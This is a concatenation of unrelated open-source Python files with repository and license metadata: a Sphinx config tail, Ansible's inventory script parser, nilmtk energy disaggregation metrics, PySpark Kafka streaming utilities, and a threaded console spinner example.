template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'py' # -- Options for LaTeX output -------------------------------------------------- # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass [howto/manual]). latex_documents = [ ('index', 'py.tex', u'py Documentation', u'holger krekel et. al.', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output -------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'py', u'py Documentation', [u'holger krekel et. al.'], 1) ] autodoc_member_order = "bysource" autodoc_default_flags = "inherited-members" # -- Options for Epub output --------------------------------------------------- # Bibliographic Dublin Core info. epub_title = u'py' epub_author = u'holger krekel et. al.' epub_publisher = u'holger krekel et. al.' epub_copyright = u'2010, holger krekel et. al.' # The language of the text. It defaults to the language option # or en if the language is not set. #epub_language = '' # The scheme of the identifier. Typical schemes are ISBN or URL. #epub_scheme = '' # The unique identifier of the text. This can be a ISBN number # or the project homepage. #epub_identifier = '' # A unique identification for the text. #epub_uid = '' # HTML files that should be inserted before the pages created by sphinx. # The format is a list of tuples containing the path and title. #epub_pre_files = [] # HTML files shat should be inserted after the pages created by sphinx. # The format is a list of tuples containing the path and title. #epub_post_files = [] # A list of files that should not be packed into the epub file. #epub_exclude_files = [] # The depth of the table of contents in toc.ncx. #epub_tocdepth = 3 # Allow duplicate toc entries. #epub_tocdup = True # Example configuration for intersphinx: refer to the Python standard library. intersphinx_mapping = {'http://docs.python.org/': None}
mpl-2.0
tgerla/ansible
lib/ansible/inventory/script.py
27
6367
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ############################################# from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import subprocess import sys from collections import Mapping from six import iteritems from ansible import constants as C from ansible.errors import * from ansible.inventory.host import Host from ansible.inventory.group import Group from ansible.module_utils.basic import json_dict_bytes_to_unicode class InventoryScript: ''' Host inventory parser for ansible using external inventory scripts. ''' def __init__(self, loader, filename=C.DEFAULT_HOST_LIST): self._loader = loader # Support inventory scripts that are not prefixed with some # path information but happen to be in the current working # directory when '.' is not in PATH. self.filename = os.path.abspath(filename) cmd = [ self.filename, "--list" ] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (stdout, stderr) = sp.communicate() if sp.returncode != 0: raise AnsibleError("Inventory script (%s) had an execution error: %s " % (filename,stderr)) self.data = stdout # see comment about _meta below self.host_vars_from_top = None self.groups = self._parse(stderr) def _parse(self, err): all_hosts = {} # not passing from_remote because data from CMDB is trusted try: self.raw = self._loader.load(self.data) except Exception as e: sys.stderr.write(err + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: {1}".format(self.filename, str(e))) if not isinstance(self.raw, Mapping): sys.stderr.write(err + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: data needs to be formatted as a json dict".format(self.filename)) self.raw = json_dict_bytes_to_unicode(self.raw) all = Group('all') groups = dict(all=all) group = None for (group_name, data) in self.raw.items(): # in Ansible 1.3 and later, a "_meta" subelement may contain # a variable "hostvars" which contains a hash for each host # if this "hostvars" exists at all then do not call --host for each # host. This is for efficiency and scripts should still return data # if called with --host for backwards compat with 1.2 and earlier. if group_name == '_meta': if 'hostvars' in data: self.host_vars_from_top = data['hostvars'] continue if group_name != all.name: group = groups[group_name] = Group(group_name) else: group = all host = None if not isinstance(data, dict): data = {'hosts': data} # is not those subkeys, then simplified syntax, host with vars elif not any(k in data for k in ('hosts','vars')): data = {'hosts': [group_name], 'vars': data} if 'hosts' in data: if not isinstance(data['hosts'], list): raise AnsibleError("You defined a group \"%s\" with bad " "data for the host list:\n %s" % (group_name, data)) for hostname in data['hosts']: if not hostname in all_hosts: all_hosts[hostname] = Host(hostname) host = all_hosts[hostname] group.add_host(host) if 'vars' in data: if not isinstance(data['vars'], dict): raise AnsibleError("You defined a group \"%s\" with bad " "data for variables:\n %s" % (group_name, data)) for k, v in iteritems(data['vars']): if group.name == all.name: all.set_variable(k, v) else: group.set_variable(k, v) # Separate loop to ensure all groups are defined for (group_name, data) in self.raw.items(): if group_name == '_meta': continue if isinstance(data, dict) and 'children' in data: for child_name in data['children']: if child_name in groups: groups[group_name].add_child_group(groups[child_name]) for group in groups.values(): if group.depth == 0 and group.name != 'all': all.add_child_group(group) return groups def get_host_variables(self, host): """ Runs <script> --host <hostname> to determine additional host variables """ if self.host_vars_from_top is not None: got = self.host_vars_from_top.get(host.name, {}) return got cmd = [self.filename, "--host", host.name] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (out, err) = sp.communicate() if out.strip() == '': return dict() try: return json_dict_bytes_to_unicode(self._loader.load(out)) except ValueError: raise AnsibleError("could not parse post variable response: %s, %s" % (cmd, out))
gpl-3.0
jaduimstra/nilmtk
nilmtk/metrics.py
5
13373
'''Metrics to compare disaggregation performance against ground truth data. All metrics functions have the same interface. Each function takes `predictions` and `ground_truth` parameters. Both of which are nilmtk.MeterGroup objects. Each function returns one of two types: either a pd.Series or a single float. Most functions return a pd.Series where each index element is a meter instance int or a tuple of ints for MeterGroups. Notation -------- Below is the notation used to mathematically define each metric. :math:`T` - number of time slices. :math:`t` - a time slice. :math:`N` - number of appliances. :math:`n` - an appliance. :math:`y^{(n)}_t` - ground truth power of appliance :math:`n` in time slice :math:`t`. :math:`\\hat{y}^{(n)}_t` - estimated power of appliance :math:`n` in time slice :math:`t`. :math:`x^{(n)}_t` - ground truth state of appliance :math:`n` in time slice :math:`t`. :math:`\\hat{x}^{(n)}_t` - estimated state of appliance :math:`n` in time slice :math:`t`. Functions --------- ''' from __future__ import print_function, division import numpy as np import pandas as pd import math from .metergroup import MeterGroup, iterate_through_submeters_of_two_metergroups from .electric import align_two_meters def error_in_assigned_energy(predictions, ground_truth): """Compute error in assigned energy. .. math:: error^{(n)} = \\left | \\sum_t y^{(n)}_t - \\sum_t \\hat{y}^{(n)}_t \\right | Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- errors : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the absolute error in assigned energy for that appliance, in kWh. """ errors = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: sections = pred_meter.good_sections() ground_truth_energy = ground_truth_meter.total_energy(sections=sections) predicted_energy = pred_meter.total_energy(sections=sections) errors[pred_meter.instance()] = np.abs(ground_truth_energy - predicted_energy) return pd.Series(errors) def fraction_energy_assigned_correctly(predictions, ground_truth): '''Compute fraction of energy assigned correctly .. math:: fraction = \\sum_n min \\left ( \\frac{\\sum_n y}{\\sum_{n,t} y}, \\frac{\\sum_n \\hat{y}}{\\sum_{n,t} \\hat{y}} \\right ) Ignores distinction between different AC types, instead if there are multiple AC types for each meter then we just take the max value across the AC types. Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- fraction : float in the range [0,1] Fraction of Energy Correctly Assigned. ''' predictions_submeters = MeterGroup(meters=predictions.submeters().meters) ground_truth_submeters = MeterGroup(meters=ground_truth.submeters().meters) fraction_per_meter_predictions = predictions_submeters.fraction_per_meter() fraction_per_meter_ground_truth = ground_truth_submeters.fraction_per_meter() fraction_per_meter_ground_truth.index = fraction_per_meter_ground_truth.index.map(lambda meter: meter.instance) fraction_per_meter_predictions.index = fraction_per_meter_predictions.index.map(lambda meter: meter.instance) fraction = 0 for meter_instance in predictions_submeters.instance(): fraction += min(fraction_per_meter_ground_truth[meter_instance], fraction_per_meter_predictions[meter_instance]) return fraction def mean_normalized_error_power(predictions, ground_truth): '''Compute mean normalized error in assigned power .. math:: error^{(n)} = \\frac { \\sum_t {\\left | y_t^{(n)} - \\hat{y}_t^{(n)} \\right |} } { \\sum_t y_t^{(n)} } Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- mne : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the MNE for that appliance. ''' mne = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: total_abs_diff = 0.0 sum_of_ground_truth_power = 0.0 for aligned_meters_chunk in align_two_meters(pred_meter, ground_truth_meter): diff = aligned_meters_chunk.icol(0) - aligned_meters_chunk.icol(1) total_abs_diff += sum(abs(diff.dropna())) sum_of_ground_truth_power += aligned_meters_chunk.icol(1).sum() mne[pred_meter.instance()] = total_abs_diff / sum_of_ground_truth_power return pd.Series(mne) def rms_error_power(predictions, ground_truth): '''Compute RMS error in assigned power .. math:: error^{(n)} = \\sqrt{ \\frac{1}{T} \\sum_t{ \\left ( y_t - \\hat{y}_t \\right )^2 } } Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- error : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the RMS error in predicted power for that appliance. ''' error = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: sum_of_squared_diff = 0.0 n_samples = 0 for aligned_meters_chunk in align_two_meters(pred_meter, ground_truth_meter): diff = aligned_meters_chunk.icol(0) - aligned_meters_chunk.icol(1) diff.dropna(inplace=True) sum_of_squared_diff += (diff ** 2).sum() n_samples += len(diff) error[pred_meter.instance()] = math.sqrt(sum_of_squared_diff / n_samples) return pd.Series(error) def f1_score(predictions, ground_truth): '''Compute F1 scores. .. math:: F_{score}^{(n)} = \\frac {2 * Precision * Recall} {Precision + Recall} Parameters ---------- predictions, ground_truth : nilmtk.MeterGroup Returns ------- f1_scores : pd.Series Each index is an meter instance int (or tuple for MeterGroups). Each value is the F1 score for that appliance. If there are multiple chunks then the value is the weighted mean of the F1 score for each chunk. ''' # If we import sklearn at top of file then sphinx breaks. from sklearn.metrics import f1_score as sklearn_f1_score # sklearn produces lots of DepreciationWarnings with PyTables import warnings warnings.filterwarnings("ignore", category=DeprecationWarning) f1_scores = {} both_sets_of_meters = iterate_through_submeters_of_two_metergroups( predictions, ground_truth) for pred_meter, ground_truth_meter in both_sets_of_meters: scores_for_meter = pd.DataFrame(columns=['score', 'n_samples']) for aligned_states_chunk in align_two_meters(pred_meter, ground_truth_meter, 'when_on'): aligned_states_chunk.dropna(inplace=True) aligned_states_chunk = aligned_states_chunk.astype(int) score = sklearn_f1_score(aligned_states_chunk.icol(0), aligned_states_chunk.icol(1)) scores_for_meter = scores_for_meter.append( {'score': score, 'n_samples': len(aligned_states_chunk)}, ignore_index=True) # Calculate weighted mean tot_samples = scores_for_meter['n_samples'].sum() scores_for_meter['proportion'] = (scores_for_meter['n_samples'] / tot_samples) avg_score = (scores_for_meter['score'] * scores_for_meter['proportion']).sum() f1_scores[pred_meter.instance()] = avg_score return pd.Series(f1_scores) ##### FUNCTIONS BELOW THIS LINE HAVE NOT YET BEEN CONVERTED TO NILMTK v0.2 ##### """ def confusion_matrices(predicted_states, ground_truth_states): '''Compute confusion matrix between appliance states for each appliance Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- dict of type {appliance : confusion matrix} ''' re = {} for appliance in predicted_states: matrix = np.zeros([np.max(ground_truth_states[appliance]) + 1, np.max(ground_truth_states[appliance]) + 1]) for time in predicted_states[appliance]: matrix[predicted_states.values[time, appliance], ground_truth_states.values[time, appliance]] += 1 re[appliance] = matrix return re def tp_fp_fn_tn(predicted_states, ground_truth_states): '''Compute counts of True Positives, False Positives, False Negatives, True Negatives .. math:: TP^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = on, \\hat{x}^{(n)}_t = on \\right ) FP^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = off, \\hat{x}^{(n)}_t = on \\right ) FN^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = on, \\hat{x}^{(n)}_t = off \\right ) TN^{(n)} = \\sum_{t} and \\left ( x^{(n)}_t = off, \\hat{x}^{(n)}_t = off \\right ) Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [TP, FP, FN, TN] ''' # assumes state 0 = off, all other states = on predicted_states_on = predicted_states > 0 ground_truth_states_on = ground_truth_states > 0 tp = np.sum(np.logical_and(predicted_states_on.values == True, ground_truth_states_on.values == True), axis=0) fp = np.sum(np.logical_and(predicted_states_on.values == True, ground_truth_states_on.values == False), axis=0) fn = np.sum(np.logical_and(predicted_states_on.values == False, ground_truth_states_on.values == True), axis=0) tn = np.sum(np.logical_and(predicted_states_on.values == False, ground_truth_states_on.values == False), axis=0) return np.array([tp, fp, fn, tn]).astype(float) def tpr_fpr(predicted_states, ground_truth_states): '''Compute True Positive Rate and False Negative Rate .. math:: TPR^{(n)} = \\frac{TP}{\\left ( TP + FN \\right )} FPR^{(n)} = \\frac{FP}{\\left ( FP + TN \\right )} Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [TPR, FPR] ''' tfpn = tp_fp_fn_tn(predicted_states, ground_truth_states) tpr = tfpn[0, :] / (tfpn[0, :] + tfpn[2, :]) fpr = tfpn[1, :] / (tfpn[1, :] + tfpn[3, :]) return np.array([tpr, fpr]) def precision_recall(predicted_states, ground_truth_states): '''Compute Precision and Recall .. math:: Precision^{(n)} = \\frac{TP}{\\left ( TP + FP \\right )} Recall^{(n)} = \\frac{TP}{\\left ( TP + FN \\right )} Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- numpy array where columns represent appliances and rows represent: [Precision, Recall] ''' tfpn = tp_fp_fn_tn(predicted_states, ground_truth_states) prec = tfpn[0, :] / (tfpn[0, :] + tfpn[1, :]) rec = tfpn[0, :] / (tfpn[0, :] + tfpn[2, :]) return np.array([prec, rec]) def hamming_loss(predicted_state, ground_truth_state): '''Compute Hamming loss .. math:: HammingLoss = \\frac{1}{T} \\sum_{t} \\frac{1}{N} \\sum_{n} xor \\left ( x^{(n)}_t, \\hat{x}^{(n)}_t \\right ) Parameters ---------- predicted_state: Pandas DataFrame of type {appliance : [array of predicted states]} ground_truth_state: Pandas DataFrame of type {appliance : [array of ground truth states]} Returns ------- float of hamming_loss ''' num_appliances = np.size(ground_truth_state.values, axis=1) xors = np.sum((predicted_state.values != ground_truth_state.values), axis=1) / num_appliances return np.mean(xors) """
apache-2.0
taroplus/spark
python/pyspark/streaming/kafka.py
7
17318
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from py4j.protocol import Py4JJavaError from pyspark.rdd import RDD from pyspark.storagelevel import StorageLevel from pyspark.serializers import AutoBatchedSerializer, PickleSerializer, PairDeserializer, \ NoOpSerializer from pyspark.streaming import DStream from pyspark.streaming.dstream import TransformedDStream from pyspark.streaming.util import TransformFunction __all__ = ['Broker', 'KafkaMessageAndMetadata', 'KafkaUtils', 'OffsetRange', 'TopicAndPartition', 'utf8_decoder'] def utf8_decoder(s): """ Decode the unicode as UTF-8 """ if s is None: return None return s.decode('utf-8') class KafkaUtils(object): @staticmethod def createStream(ssc, zkQuorum, groupId, topics, kafkaParams=None, storageLevel=StorageLevel.MEMORY_AND_DISK_2, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder): """ Create an input stream that pulls messages from a Kafka Broker. :param ssc: StreamingContext object :param zkQuorum: Zookeeper quorum (hostname:port,hostname:port,..). :param groupId: The group id for this consumer. :param topics: Dict of (topic_name -> numPartitions) to consume. Each partition is consumed in its own thread. :param kafkaParams: Additional params for Kafka :param storageLevel: RDD storage level. :param keyDecoder: A function used to decode key (default is utf8_decoder) :param valueDecoder: A function used to decode value (default is utf8_decoder) :return: A DStream object .. note:: Deprecated in 2.3.0 """ if kafkaParams is None: kafkaParams = dict() kafkaParams.update({ "zookeeper.connect": zkQuorum, "group.id": groupId, "zookeeper.connection.timeout.ms": "10000", }) if not isinstance(topics, dict): raise TypeError("topics should be dict") jlevel = ssc._sc._getJavaStorageLevel(storageLevel) helper = KafkaUtils._get_helper(ssc._sc) jstream = helper.createStream(ssc._jssc, kafkaParams, topics, jlevel) ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) stream = DStream(jstream, ssc, ser) return stream.map(lambda k_v: (keyDecoder(k_v[0]), valueDecoder(k_v[1]))) @staticmethod def createDirectStream(ssc, topics, kafkaParams, fromOffsets=None, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder, messageHandler=None): """ Create an input stream that directly pulls messages from a Kafka Broker and specific offset. This is not a receiver based Kafka input stream, it directly pulls the message from Kafka in each batch duration and processed without storing. This does not use Zookeeper to store offsets. The consumed offsets are tracked by the stream itself. For interoperability with Kafka monitoring tools that depend on Zookeeper, you have to update Kafka/Zookeeper yourself from the streaming application. You can access the offsets used in each batch from the generated RDDs (see To recover from driver failures, you have to enable checkpointing in the StreamingContext. The information on consumed offset can be recovered from the checkpoint. See the programming guide for details (constraints, etc.). :param ssc: StreamingContext object. :param topics: list of topic_name to consume. :param kafkaParams: Additional params for Kafka. :param fromOffsets: Per-topic/partition Kafka offsets defining the (inclusive) starting point of the stream. :param keyDecoder: A function used to decode key (default is utf8_decoder). :param valueDecoder: A function used to decode value (default is utf8_decoder). :param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess meta using messageHandler (default is None). :return: A DStream object .. note:: Experimental .. note:: Deprecated in 2.3.0 """ if fromOffsets is None: fromOffsets = dict() if not isinstance(topics, list): raise TypeError("topics should be list") if not isinstance(kafkaParams, dict): raise TypeError("kafkaParams should be dict") def funcWithoutMessageHandler(k_v): return (keyDecoder(k_v[0]), valueDecoder(k_v[1])) def funcWithMessageHandler(m): m._set_key_decoder(keyDecoder) m._set_value_decoder(valueDecoder) return messageHandler(m) helper = KafkaUtils._get_helper(ssc._sc) jfromOffsets = dict([(k._jTopicAndPartition(helper), v) for (k, v) in fromOffsets.items()]) if messageHandler is None: ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) func = funcWithoutMessageHandler jstream = helper.createDirectStreamWithoutMessageHandler( ssc._jssc, kafkaParams, set(topics), jfromOffsets) else: ser = AutoBatchedSerializer(PickleSerializer()) func = funcWithMessageHandler jstream = helper.createDirectStreamWithMessageHandler( ssc._jssc, kafkaParams, set(topics), jfromOffsets) stream = DStream(jstream, ssc, ser).map(func) return KafkaDStream(stream._jdstream, ssc, stream._jrdd_deserializer) @staticmethod def createRDD(sc, kafkaParams, offsetRanges, leaders=None, keyDecoder=utf8_decoder, valueDecoder=utf8_decoder, messageHandler=None): """ Create an RDD from Kafka using offset ranges for each topic and partition. :param sc: SparkContext object :param kafkaParams: Additional params for Kafka :param offsetRanges: list of offsetRange to specify topic:partition:[start, end) to consume :param leaders: Kafka brokers for each TopicAndPartition in offsetRanges. May be an empty map, in which case leaders will be looked up on the driver. :param keyDecoder: A function used to decode key (default is utf8_decoder) :param valueDecoder: A function used to decode value (default is utf8_decoder) :param messageHandler: A function used to convert KafkaMessageAndMetadata. You can assess meta using messageHandler (default is None). :return: An RDD object .. note:: Experimental .. note:: Deprecated in 2.3.0 """ if leaders is None: leaders = dict() if not isinstance(kafkaParams, dict): raise TypeError("kafkaParams should be dict") if not isinstance(offsetRanges, list): raise TypeError("offsetRanges should be list") def funcWithoutMessageHandler(k_v): return (keyDecoder(k_v[0]), valueDecoder(k_v[1])) def funcWithMessageHandler(m): m._set_key_decoder(keyDecoder) m._set_value_decoder(valueDecoder) return messageHandler(m) helper = KafkaUtils._get_helper(sc) joffsetRanges = [o._jOffsetRange(helper) for o in offsetRanges] jleaders = dict([(k._jTopicAndPartition(helper), v._jBroker(helper)) for (k, v) in leaders.items()]) if messageHandler is None: jrdd = helper.createRDDWithoutMessageHandler( sc._jsc, kafkaParams, joffsetRanges, jleaders) ser = PairDeserializer(NoOpSerializer(), NoOpSerializer()) rdd = RDD(jrdd, sc, ser).map(funcWithoutMessageHandler) else: jrdd = helper.createRDDWithMessageHandler( sc._jsc, kafkaParams, joffsetRanges, jleaders) rdd = RDD(jrdd, sc).map(funcWithMessageHandler) return KafkaRDD(rdd._jrdd, sc, rdd._jrdd_deserializer) @staticmethod def _get_helper(sc): try: return sc._jvm.org.apache.spark.streaming.kafka.KafkaUtilsPythonHelper() except TypeError as e: if str(e) == "'JavaPackage' object is not callable": KafkaUtils._printErrorMsg(sc) raise @staticmethod def _printErrorMsg(sc): print(""" ________________________________________________________________________________________________ Spark Streaming's Kafka libraries not found in class path. Try one of the following. 1. Include the Kafka library and its dependencies with in the spark-submit command as $ bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8:%s ... 2. Download the JAR of the artifact from Maven Central http://search.maven.org/, Group Id = org.apache.spark, Artifact Id = spark-streaming-kafka-0-8-assembly, Version = %s. Then, include the jar in the spark-submit command as $ bin/spark-submit --jars <spark-streaming-kafka-0-8-assembly.jar> ... ________________________________________________________________________________________________ """ % (sc.version, sc.version)) class OffsetRange(object): """ Represents a range of offsets from a single Kafka TopicAndPartition. .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition, fromOffset, untilOffset): """ Create an OffsetRange to represent range of offsets :param topic: Kafka topic name. :param partition: Kafka partition id. :param fromOffset: Inclusive starting offset. :param untilOffset: Exclusive ending offset. """ self.topic = topic self.partition = partition self.fromOffset = fromOffset self.untilOffset = untilOffset def __eq__(self, other): if isinstance(other, self.__class__): return (self.topic == other.topic and self.partition == other.partition and self.fromOffset == other.fromOffset and self.untilOffset == other.untilOffset) else: return False def __ne__(self, other): return not self.__eq__(other) def __str__(self): return "OffsetRange(topic: %s, partition: %d, range: [%d -> %d]" \ % (self.topic, self.partition, self.fromOffset, self.untilOffset) def _jOffsetRange(self, helper): return helper.createOffsetRange(self.topic, self.partition, self.fromOffset, self.untilOffset) class TopicAndPartition(object): """ Represents a specific topic and partition for Kafka. .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition): """ Create a Python TopicAndPartition to map to the Java related object :param topic: Kafka topic name. :param partition: Kafka partition id. """ self._topic = topic self._partition = partition def _jTopicAndPartition(self, helper): return helper.createTopicAndPartition(self._topic, self._partition) def __eq__(self, other): if isinstance(other, self.__class__): return (self._topic == other._topic and self._partition == other._partition) else: return False def __ne__(self, other): return not self.__eq__(other) def __hash__(self): return (self._topic, self._partition).__hash__() class Broker(object): """ Represent the host and port info for a Kafka broker. .. note:: Deprecated in 2.3.0 """ def __init__(self, host, port): """ Create a Python Broker to map to the Java related object. :param host: Broker's hostname. :param port: Broker's port. """ self._host = host self._port = port def _jBroker(self, helper): return helper.createBroker(self._host, self._port) class KafkaRDD(RDD): """ A Python wrapper of KafkaRDD, to provide additional information on normal RDD. .. note:: Deprecated in 2.3.0 """ def __init__(self, jrdd, ctx, jrdd_deserializer): RDD.__init__(self, jrdd, ctx, jrdd_deserializer) def offsetRanges(self): """ Get the OffsetRange of specific KafkaRDD. :return: A list of OffsetRange """ helper = KafkaUtils._get_helper(self.ctx) joffsetRanges = helper.offsetRangesOfKafkaRDD(self._jrdd.rdd()) ranges = [OffsetRange(o.topic(), o.partition(), o.fromOffset(), o.untilOffset()) for o in joffsetRanges] return ranges class KafkaDStream(DStream): """ A Python wrapper of KafkaDStream .. note:: Deprecated in 2.3.0 """ def __init__(self, jdstream, ssc, jrdd_deserializer): DStream.__init__(self, jdstream, ssc, jrdd_deserializer) def foreachRDD(self, func): """ Apply a function to each RDD in this DStream. """ if func.__code__.co_argcount == 1: old_func = func func = lambda r, rdd: old_func(rdd) jfunc = TransformFunction(self._sc, func, self._jrdd_deserializer) \ .rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser)) api = self._ssc._jvm.PythonDStream api.callForeachRDD(self._jdstream, jfunc) def transform(self, func): """ Return a new DStream in which each RDD is generated by applying a function on each RDD of this DStream. `func` can have one argument of `rdd`, or have two arguments of (`time`, `rdd`) """ if func.__code__.co_argcount == 1: oldfunc = func func = lambda t, rdd: oldfunc(rdd) assert func.__code__.co_argcount == 2, "func should take one or two arguments" return KafkaTransformedDStream(self, func) class KafkaTransformedDStream(TransformedDStream): """ Kafka specific wrapper of TransformedDStream to transform on Kafka RDD. .. note:: Deprecated in 2.3.0 """ def __init__(self, prev, func): TransformedDStream.__init__(self, prev, func) @property def _jdstream(self): if self._jdstream_val is not None: return self._jdstream_val jfunc = TransformFunction(self._sc, self.func, self.prev._jrdd_deserializer) \ .rdd_wrapper(lambda jrdd, ctx, ser: KafkaRDD(jrdd, ctx, ser)) dstream = self._sc._jvm.PythonTransformedDStream(self.prev._jdstream.dstream(), jfunc) self._jdstream_val = dstream.asJavaDStream() return self._jdstream_val class KafkaMessageAndMetadata(object): """ Kafka message and metadata information. Including topic, partition, offset and message .. note:: Deprecated in 2.3.0 """ def __init__(self, topic, partition, offset, key, message): """ Python wrapper of Kafka MessageAndMetadata :param topic: topic name of this Kafka message :param partition: partition id of this Kafka message :param offset: Offset of this Kafka message in the specific partition :param key: key payload of this Kafka message, can be null if this Kafka message has no key specified, the return data is undecoded bytearry. :param message: actual message payload of this Kafka message, the return data is undecoded bytearray. """ self.topic = topic self.partition = partition self.offset = offset self._rawKey = key self._rawMessage = message self._keyDecoder = utf8_decoder self._valueDecoder = utf8_decoder def __str__(self): return "KafkaMessageAndMetadata(topic: %s, partition: %d, offset: %d, key and message...)" \ % (self.topic, self.partition, self.offset) def __repr__(self): return self.__str__() def __reduce__(self): return (KafkaMessageAndMetadata, (self.topic, self.partition, self.offset, self._rawKey, self._rawMessage)) def _set_key_decoder(self, decoder): self._keyDecoder = decoder def _set_value_decoder(self, decoder): self._valueDecoder = decoder @property def key(self): return self._keyDecoder(self._rawKey) @property def message(self): return self._valueDecoder(self._rawMessage)
apache-2.0
everaldo/example-code
18-asyncio/spinner_thread.py
13
1273
# spinner_thread.py # credits: Adapted from Michele Simionato's # multiprocessing example in the python-list: # https://mail.python.org/pipermail/python-list/2009-February/538048.html # BEGIN SPINNER_THREAD import threading import itertools import time import sys class Signal: # <1> go = True def spin(msg, signal): # <2> write, flush = sys.stdout.write, sys.stdout.flush for char in itertools.cycle('|/-\\'): # <3> status = char + ' ' + msg write(status) flush() write('\x08' * len(status)) # <4> time.sleep(.1) if not signal.go: # <5> break write(' ' * len(status) + '\x08' * len(status)) # <6> def slow_function(): # <7> # pretend waiting a long time for I/O time.sleep(3) # <8> return 42 def supervisor(): # <9> signal = Signal() spinner = threading.Thread(target=spin, args=('thinking!', signal)) print('spinner object:', spinner) # <10> spinner.start() # <11> result = slow_function() # <12> signal.go = False # <13> spinner.join() # <14> return result def main(): result = supervisor() # <15> print('Answer:', result) if __name__ == '__main__': main() # END SPINNER_THREAD
mit
google/grr
grr/server/grr_response_server/gui/api_plugins/yara.py
1
1489
